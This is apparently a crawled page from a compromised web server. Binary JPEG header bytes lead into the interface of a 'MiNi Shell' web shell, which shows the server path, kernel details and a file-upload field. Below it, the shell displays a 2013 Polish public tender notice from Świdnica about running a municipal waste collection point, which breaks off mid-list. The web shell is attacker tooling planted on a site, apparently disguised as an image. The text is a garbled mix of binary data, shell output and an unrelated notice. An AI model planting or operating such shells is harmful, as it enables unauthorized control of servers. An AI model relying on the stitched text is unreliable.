JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130417/152634-N-2013.html

<p class="kh_header"><b>Świdnica: Organizacja i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasto Świdnica</b><br>
<b>Numer ogłoszenia: 152634 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasto Świdnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. PRZEDMIOT ZAMÓWIENIA
Świadczenie usługi polegającej na organizacji i prowadzeniu Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasto Świdnica wraz z zagospodarowaniem zebranych w w/w punkcie odpadów.
Kod CPV:
90511200-4 Usługi gromadzenia odpadów pochodzących z gospodarstw domowych;
90513100-7 Usługi wywozu odpadów pochodzących z gospodarstw domowych;
90514000-3 Usługi recyklingu odpadów;
90533000-2 Usługi gospodarki odpadami.

V. OPIS PRZEDMIOTU ZAMÓWIENIA
Przedmiotem zamówienia jest organizacja i prowadzenie Punktu Selektywnego Gromadzenia Odpadów Komunalnych w granicach Gminy Miasto Świdnica, na terenie nieruchomości będącej własnością Wykonawcy, bądź będącej w jego użytkowaniu. Punkt Selektywnego Zbierania Odpadów Komunalnych, zwany w dalszej części PSZOK, będzie miejscem zbiórki i czasowego magazynowania odpadów selektywnie zebranych, zawartych we frakcji odpadów komunalnych, dostarczanych przez właścicieli nieruchomości objętych gminnym systemem gospodarowania odpadami komunalnymi. Odpady zebrane w PSZOK będą przekazywane do podmiotów uprawnionych do odzysku, recyklingu bądź unieszkodliwienia.
Przedmiot zamówienia będzie realizowany przez 24 miesiące począwszy od dnia 01 lipca 2013r.

1. Rodzaje i przewidywane ilości odpadów zbieranych w PSZOK
Zamawiający wymaga, aby, w PSZOK były zbierane następujące rodzaje odpadów, zgodnie z zapisami:
- uchwały nr XIX/232/12 Rady Miejskiej w Świdnicy z dnia 20 sierpnia 2012r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Miasto Świdnica (DZ.U. z 2012r. poz. 3797),
- uchwały nr XXI/253/12 Rady Miejskiej w Świdnicy z dnia 25 października 2012r.
zmieniającej uchwałę w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Miasto Świdnica,
- uchwały nr XIX/230/12 Rady miejskiej Świdnicy z dnia 20 sierpnia 2012r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi (Dz. U. z 2012r. poz. 3793),
- uchwały nr XXI/254/12 Rady Miejskiej w Świdnicy zmieniającej uchwałę w sprawie
szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów
komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi( Dz.U. z 2012r. poz. 3794):
1) zużyty sprzęt elektryczny i elektroniczny
2) zużyte baterie i akumulatory,
3) odpady budowlane i rozbiórkowe,
4) meble i inne odpady wielkogabarytowe,
5) zużyte opony,
6) chemikalia, w tym opakowania po chemikaliach,
7) odpady zielone,
8) odpady ulegające biodegradacji inne niż zielone, w tym odzież i tekstylia,
9) inne odpady niebezpieczne powstające w gospodarstwach domowych,
10)papier i tektura,
11)metal,
12)tworzywa sztuczne,
13)szkło i opakowania ze szkła,
14)opakowania wielomateriałowe,
15)opakowania ulegające biodegradacji.

Kody odpadów zbieranych w PSZOK zawiera załącznik nr 1 do SIWZ.
Szacowana ilość poszczególnych rodzajów odpadów została wyliczona na podstawie
wytycznych wynikających z Krajowego Planu Gospodarki Odpadami 2014 (KPGO 2014) oraz Wojewódzkiego Planu Gospodarki Odpadami, a także prognozowanej ilości odpadów komunalnych wytworzonych na terenie Gminy Miasto Świdnica przy założeniu prognozowanej ilości mieszkańców:
- prognozowana liczba mieszkańców Świdnicy wg GUS w 2013r. - 57 578 osób
- szacowana ilość wytworzonych odpadów komunalnych - 23 549,40 Mg.

Zamawiający szacuje, że w PSZOK w ciągu roku zebrane zostaną odpady w ilościach przedstawionych w Tabeli nr 1.
Tab.1. Szacowana ilość poszczególnych rodzajów odpadów komunalnych zebranych w PSZOK
Lp. Rodzaj odbieranej frakcji odpadów Przewidywany strumień trafiający do PSZOK
[Mg]
1 2 3
1
zużyty sprzęt elektryczny i elektroniczny 16,0
2
zużyte baterie i akumulatory 1,0
3
odpady budowlane i rozbiórkowe 600,0
4
meble i inne odpady wielkogabarytowe, 60,0
5
zużyte opony,8,0
6
chemikalia, w tym opakowania po chemikaliach, 5,0
7
odpady zielone, 500,0
8
odpady ulegające biodegradacji inne niż zielone, w tym odzież i tekstylia i opakowania ulegające biodegradacji 50,0
9
inne odpady niebezpieczne powstające w gospodarstwach domowych, 2,0
10
papier i tektura, 100,0
11
metal, 5,0
12
tworzywa sztuczne, 100,0
13
szkło i opakowania ze szkła, 200,0
14 opakowania wielomateriałowe 50,0
Razem: 1.697,00
Zamawiający zastrzega, że w trakcie realizacji usługi możliwe są więc zmiany ilości
odpadów przyjmowanych do PSZOK. Zmiany te mogą dotyczyć zarówno zmniejszenia, jak i zwiększenia ilości odpadów. Zmiany te nie będą wpływały na wysokości wynagrodzenia Wykonawcy, chyba że masa odpadów wzrośnie lub zmniejszy się o 10 % w stosunku do szacowanej ilości odpadów podanej w niniejszej SIWZ.

2. Sposoby postępowania z odpadami zgromadzonymi w PSZOK.
Odpady należy gromadzić selektywnie w przygotowanych do tego celu pojemnikach
i boksach z uwzględnieniem wszystkich przepisów stanowiących o sposobie magazynowania poszczególnych rodzajów odpadów.
Następnie zgromadzone odpady należy przekazywać uprawnionym podmiotom celem
poddania ich odzyskowi, recyklingowi bądź unieszkodliwianiu zgodnie z hierarchią
postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012r.
o odpadach (Dz.U. z 2013r., poz. 21) oraz zgodnie z przepisami:
- ustawy prawo ochrony środowiska z dnia 27 kwietnia 2001r. (Dz. U. z 2008r. Nr 25, poz. 150 z późn. zm.),
- ustawy o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012r., poz.391 z późn. zm.),
- uchwały nr XXIV/616/12 Sejmiku Województwa Dolnośląskiego z dnia 27 czerwca 2012r., do której załącznik stanowi Wojewódzki Plan Gospodarki Odpadami

Tab. 2. Szczególne wymagania Zamawiającego w zakresie miejsc zagospodarowania wybranych rodzajów
odpadów:
Lp. Rodzaj odbieranej frakcji odpadów
Miejsca zagospodarowania poszczególnych rodzajów
zebranych odpadów
1 2 3
1
zużyty sprzęt elektryczny i elektroniczny, zużyte baterie i akumulatory
Instalacje odzysku zużytego sprzętu elektrycznego i
elektronicznego, organizacje odzysku
2
odpady budowlane i rozbiórkowe
Instalacje i organizacje recyklingu, przygotowania do
ponownego użycia
3
odpady zielone i odpady biodegradowlane
Regionalna Instalacja Przetwarzania Odpadów
Komunalnych - kompostownia, wskazana w uchwale o
wykonaniu WPGO 2012 oraz uchwałach zmieniających
4
papier i tektura, metal, tworzywa sztuczne, szkło i opakowania ze szkła,
opakowania wielomateriałowe, opakowania ulegające biodegradacji
Instalacje i organizacje recyklingu, przygotowania do ponownego użycia Zgromadzone w pojemnikach odpady powinny zostać przekazane do odpowiedniej instalacji w takim czasie, aby nie doprowadzać do przepełnienia tych pojemników.
Gromadzenie odpadów zielonych i biodegradowalnych nie może powodować uciążliwości zapachowych i nie mogą one być przetrzymywane na terenie PSZOK dłużej niż 7 dni.

3. Opis miejsca lokalizacji PSZOK oraz jego wyposażenia.
Teren, na którym będzie prowadzony PSZOK musi być:
a) położony w miejscu ogólnie dostępnym dla mieszkańców Świdnicy;
b) o powierzchni minimum 500 m2;
c) utwardzony z odprowadzeniem wód deszczowych do kanalizacji;
d) ogrodzony, tak aby uniemożliwić wstęp osobom niepowołanym;
e) oświetlony;
f) wyposażony w wiaty , pod którymi będą ustawione wszystkie pojemniki do zbierania odpadów, w celu ochrony przed bezpośrednim działaniem czynników
atmosferycznych lub obiekty magazynowe;
g) monitorowany w sposób umożliwiający przekaz obrazu na żywo;
h) wyposażony w wagę legalizowaną umożliwiającą określenie ilości przyjmowanych do PSZOK gruzu i innych odpadów budowlanych oraz odpadów zielonych, których
przyjmowanie do PSZOK jest limitowane;
i) wyposażony w obiekt socjalno-administracyjny z łączem telefonicznym;
j) oznakowany tablicami lub banerami informacyjnymi przy każdym wejściu i wyjściu
z PSZOK, wykonanymi w taki sposób, aby informacje były czytelne i zawierały dane:
- nazwę: Gminny Punkt Selektywnego Zbierania Odpadów Komunalnych ..,
- godziny i dni otwarcia,
- nazwa, adres i numer telefonu Wykonawcy,
- logo CZYSTA ŚWIDNICA- załącznik nr 2 do SIWZ
(minimalna powierzchnia głównej tablicy informacyjnej PSZOK to 3,0 m2), w terminie
od 1 lipca 2013r.
k) wyposażony w tablice z informacją o lokalizacji pojemników przeznaczonych na
poszczególne frakcje odpadów w postaci graficznej planu sytuacyjnego;
l) przygotowany w sposób spełniający wymogi przeciwpożarowe oraz z zachowaniem przepisów bezpieczeństwa i higieny pracy;
m) wyposażony w minimum 4 miejsca parkingowe dla osób przywożących odpady do
PSZOK;

PSZOK powinien być wyposażony w następujące rodzaje pojemników:

Tab. 3. Rodzaje pojemników przeznaczonych na poszczególne rodzaje odpadów odbieranych w PSZOK.
Lp. Rodzaj odbieranego odpadu Rodzaj pojemnika
przeznaczonego na ten odpad
Minimalna ilość danego
rodzaju pojemnika
1 2 3 4
1 Zużyty sprzęt elektryczny i
elektroniczny
Pojemnik kontenerowy
magazynowy zamknięty lub
obiekt magazynowy o
kubaturze min. 10 m3
1
2 Zużyte baterie Zamknięty pojemnik na zużyte
baterie 1
3 Zużyte akumulatory Zamknięty pojemnik na zużyte
akumulatory 1
4. Odpady budowlane i rozbiórkowe
Kontener otwarty typu KP-7 z przeznaczeniem na odpady
budowlane typu gruz ceglany i betonowy oraz materiały ceramiczne 2
Kontener otwarty typu KP-7 z przeznaczeniem na pozostałe odpady budowlane i
rozbiórkowe nie zawierające substancji i odpadów niebezpiecznych 2
5 Meble i inne odpady
wielkogabarytowe
Pojemnik kontenerowy
magazynowy zamknięty lub
zadaszony boks o kubaturze
min. 10 m3 lub obiekt
magazynowy
1
6 Zużyte opony Kontener otwarty typu KP-7
1
7 Chemikalia, w tym opakowania
po chemikaliach
Pojemnik odporny na działanie
związków chemicznych 2
8 Odpady zielone Kontener otwarty typu KP-7
1
9 Odpady ulegające biodegradacji
inne niż zielone,
Kontener otwarty typu KP-7
1
10 Odpady ulegające biodegradacji
inne niż zielone -odzież i
tekstylia
Kontener o minimalnej
pojemności 1100l 1
11 Inne odpady niebezpieczne
powstające w gospodarstwach
domowych
Pojemnik przeznaczony na
odpady zawierające rtęć i inne
substancje niebezpieczne
1
12 Papier i tektura Pojemnik MGB 1100l
1
13 Szkło i opakowania ze szkła Pojemnik MGB 1100l
1
14 Tworzywa sztuczne Pojemnik MGB 1100l
1
15 Metal Pojemnik MGB 1100l
1
16 Opakowania wielomateriałowe Pojemnik MGB 1100l
1
Pojemniki powinny być oznakowane w sposób niebudzący wątpliwości, jakie odpady należy w nich umieszczać, ponadto pojemniki przeznaczone do zbierania papieru i tektury powinny być w kolorze niebieskim, pojemniki przeznaczone do zbierania szkła i opakowań ze szkła powinny być w kolorze zielonym a pojemniki przeznaczone na zbieranie tworzyw sztucznych powinny być w kolorze żółtym.

4. Opis funkcjonowania Punktu Selektywnego Zbierania Odpadów Komunalnych
Punkt będzie czynny od poniedziałku do piątku w godzinach:od 12:00 do godz. 18:00 oraz w sobotę w godzinach od 10:00 do 16:00.
W tym czasie na miejscu musi być obecny minimum jeden pracownik obsługi PSZOK.
W ramach prowadzenia PSZOK Wykonawca zobowiązany jest do:
- przyjmowania odpadów od mieszkańców objętych gminnym systemem gospodarowania
odpadami komunalnymi oraz wskazywanie miejsc przeznaczonych do ich gromadzenia;
- wydawania formularza przekazania odpadu i nadzór nad prawidłowością jego
wypełnienia;
- ważenia odpadów oddawanych przez mieszkańców, które tego wymagają, takich jak
gruz, inne odpady budowlane, odpady zielone;
- prowadzenia ewidencji właścicieli nieruchomości dostarczających odpady, których ilość
lub waga przyjęcia do PSZOK jest limitowana;
- prowadzenie statystyki osób oddających odpady do PSZOK;
- prowadzenia ewidencji odpadów przyjmowanych do PSZOK;
- prowadzenie ewidencji ilościowej i rodzajowej odpadów przekazanych do odpowiednich
instalacji;
- utrzymywania czystości i porządku na terenie PSZOK, poprzez bieżące sprzątanie terenu
oraz w przypadku wystąpienia opadów śniegu - odśnieżanie, w przypadku wystąpienia
śliskości - usuwanie jej;
- zapewnienia kontaktu telefonicznego z obsługą PSZOK w czasie otwarcia - dla wszystkich
mieszkańców oraz Zamawiającego, a także poza godzinami otwarcia PSZOK - dla
Zamawiającego;
- przekazywania odpadów zgromadzonych w PSZOK do zagospodarowania z minimalną
częstotliwością wskazaną w pkt. 2.
Regulamin funkcjonowania Punktu Selektywnego Zbierania Odpadów oraz wzór formularza
przekazania odpadu zawiera załącznik nr 3 do SIWZ.
Zamawiający zastrzega sobie prawo do wprowadzenia zmian do Regulaminu funkcjonowania
PSZOK w trakcie świadczenia usługi przez Wykonawcę, w szczególności w zakresie:
- możliwości nieodpłatnego przekazywania mebli i innych odpadów wielkogabarytowych
osobom potrzebującym, po uprzedniej akceptacji Zamawiającego;
- zmiany maksymalnej jednorazowej ilości odpadów, których przyjęcie do PSZOK jest
limitowane;
- rodzaju odpadów komunalnych przyjmowanych do PSZOK;
- godzin otwarcia PSZOK, przy czym Zamawiający zastrzega, że tygodniowy czas pracy
PSZOK nie ulegnie wydłużeniu.
5. Sprawozdawczość.
Zamawiający wymaga, aby z prowadzonych czynności w PSZOK składane były comiesięczne
sprawozdania. Sprawozdanie miesięczne powinno zawierać następujące informacje:
- nazwa i adres podmiotu prowadzącego PSZOK,
- imię i nazwisko osoby pracującej przy obsłudze PSZOK,
- imię i nazwisko osoby odpowiedzialnej za sporządzenie sprawozdania,
- nr telefonu kontaktowego do pracownika i osoby odpowiedzialnej,
- okres, za który sprawozdanie jest składane,
- ewidencja właścicieli nieruchomości, którzy dostarczyli odpady do PSZOK,
- ewidencja odpadów przyjętych do PSZOK z określeniem rodzaju i ilości przyjętych
odpadu,
- informacje o miejscu, sposobie, rodzaju i masie odpadów poddanych poszczególnym
sposobom zagospodarowania,
Sprawozdanie miesięczne Wykonawca zobowiązany jest dostarczyć w terminie do 14 dnia miesiąca następującego po miesiącu rozliczeniowym.
6. Inne wymagania stawiane wykonawcy.
Zamawiający wymaga, aby w ramach realizacji zadania wykonawca przygotowany był na przyjęcie we wskazanych przez Zamawiającego terminach zorganizowanych grup osób (dzieci, młodzieży, dorosłych) i prezentację funkcjonowania Punktu Selektywnego Zbierania Odpadów oraz udostępnianie materiałów informacyjno-edukacyjnych z zakresu gospodarki
odpadami przygotowanych i dostarczonych przez Zamawiającego, a niewymagających
potwierdzenia odbioru.
VI. TERMIN WYKONANIA ZAMÓWIENIA
Okres wykonania zamówienia : od 1 lipca 2013r. do 30 czerwca 2015r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art.67 ust.1 pkt 6 ustawy przewiduje, w okresie 24 miesiące od podpisania umowy, udzielenie zamówień uzupełniających do 50% wartości zamówienia podstawowego.
Zamawiający udzieli takich zamówień w przypadku pojawienia się w okresie trwania umowy zapotrzebowania na usługi objęte przedmiotem zamówienia ponad zakres bieżącego zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.12.00-4, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> XII. WYMAGANIA DOTYCZĄCE WADIUM
1. Oferta powinna być zabezpieczona wadium w wysokości: 10 000,00 (słownie: dziesięć tysięcy złotych).
2. Wadium winno zostać wniesione przed upływem terminu składania oferty, tj. przez 08-05-2013 r. przed godz. 09:00.
3. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych z tym, że wadium złożone w:
a) pieniądzu: należy przelać na rachunek bankowy Zamawiającego w Banku PKO S.A. I Oddział w Świdnicy nr 96 1240 1978 1111 0010 0166 5724; kwota wadium
wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego
przed upływem terminu składania ofert,
b) gwarancjach (bankowych, ubezpieczeniowych): z treści gwarancji winno wynikać
bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w
terminie związania z ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu
pełnej kwoty wadium w okolicznościach określonych w art. 45 ust. 5 ustawy
Prawo zamówień publicznych, tj. w przypadku gdy Wykonawca:
- odmówi podpisania umowy w sprawie zamówienia publicznego na
warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
z przyczyn leżących po stronie Wykonawcy,
- w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 ustawy Prawo
zamówień publicznych nie złożył dokumentów lub oświadczeń, o których
mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika
to z przyczyn nie leżących po jego stronie,
c) innej niż pieniądz formie: należy złożyć w kasie Zamawiającego jako depozyt za
potwierdzeniem, przed upływem terminu składania oferty.
4. W przypadku złożenia wadium w formie innej niż pieniądz, dokument
gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać
wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art. 23 ustawy Prawo zamówień publicznych.
5. Do oferty należy dołączyć potwierdzenie realizacji przelewu lub oryginał złożenia
depozytu.
6. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania z ofertą, przy czym bieg terminu związania z ofertą rozpoczyna się wraz z upływem terminu składania ofert.
7. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w pkt. 10.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
z przyczyn leżących po stronie Wykonawcy,
d) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo
zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa
w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn
nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) posiadają zezwolenie na zbieranie odpadów komunalnych oraz odpadów
komunalnych niebezpiecznych wydane przez organ właściwy ze względu na
miejsce zbierania odpadów, o którym mowa w art. 41 ust. 1 lub w art. 232 ust. 1
ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), co
najmniej w zakresie odpadów o kodach wymienionych w załączniku nr 1 do
SIWZ;
b) posiadają wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny
i elektroniczny, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012r.
( Dz. U. z 2013r.,poz. 21) prowadzonego przez Marszałka Województwa lub
przez Głównego Inspektora Ochrony Środowiska, do czasu utworzenia ww.
rejestru przez Marszałka Województwa, zgodnie z art. 235 ust. 2 ww. ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie tzn. w okresie ostatnich trzech lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie Wykonawca wykonał lub wykonuje usługi odbierania odpadów segregowanych,
wielkogabarytowych i przekazywania do miejsca ich zagospodarowania w ilości nie
mniejszej niż 100 Mg łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Wykonawca wykaże, że dysponuje następującym potencjałem technicznym:
- nieruchomością, na którym będzie prowadzony Punkt Selektywnego
Zbierania Odpadów Komunalnych, spełniającym wymagania opisane w
rozdziale V, pkt.3 lit. a) - e), niniejszej SIWZ;
- pojemnikami do gromadzenia odpadów segregowanych o pojemności
1100l, w określonej przez Zamawiającego kolorystyce:
-pojemniki w kolorze niebieskim na odpady zawierające frakcje:
papier i makulatura - minimum 1 szt.,
-pojemniki w kolorze żółtym na odpady zawierające frakcje: metali,
tworzyw sztucznych, opakowania wielomateriałowe, odzież
i tekstylia - minimum 1 szt.,
-pojemniki w kolorze zielonym na odpady zawierające frakcje:
opakowania ze szkła białego i kolorowego - minimum 1 szt.;
- pojemnikiem kontenerowym otwartym, typu KP7 do gromadzenia
odpadów budowlanych i remontowych - minimum 4 szt.;
- pojemnikiem kontenerowym otwartym, typu KP7 na odpady zielone
i odpady ulegające biodegradacji - minimum 3 szt.;
- pojemnikiem na lampy fluorescencyjne - minimum 1szt.;
